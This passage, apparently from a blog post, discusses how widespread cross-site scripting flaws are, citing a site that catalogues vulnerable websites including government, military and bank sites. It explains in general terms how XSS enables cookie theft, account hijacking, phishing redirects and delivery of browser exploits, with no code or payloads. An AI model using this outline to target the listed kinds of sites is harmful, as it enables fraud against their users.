|
So many in fact, that there is a dedicated website to list them! According to their stats, there are currently 14229 total vulnerable sites posted (and only 467 fixed).
Want to see how many Australian government websites are vulnerable?
How about the American military? Or banks?
Of course, it is important to keep in mind that XSS poses no direct threat to the server itself - only the clients that access it. If the client uses cookie based authentication, it opens a whole new can of worms, and can be used to hijack the account (e.g. user identity or transfer of funds), and this may escalate to server compromise or pose significant risk to an organisation.
The other use for XSS is on reputable websites, such as real banks with XSS injected code to redirect the client to a fake phishing bank instead. Or simply inject a rogue site hosting browser based remote exploits.
|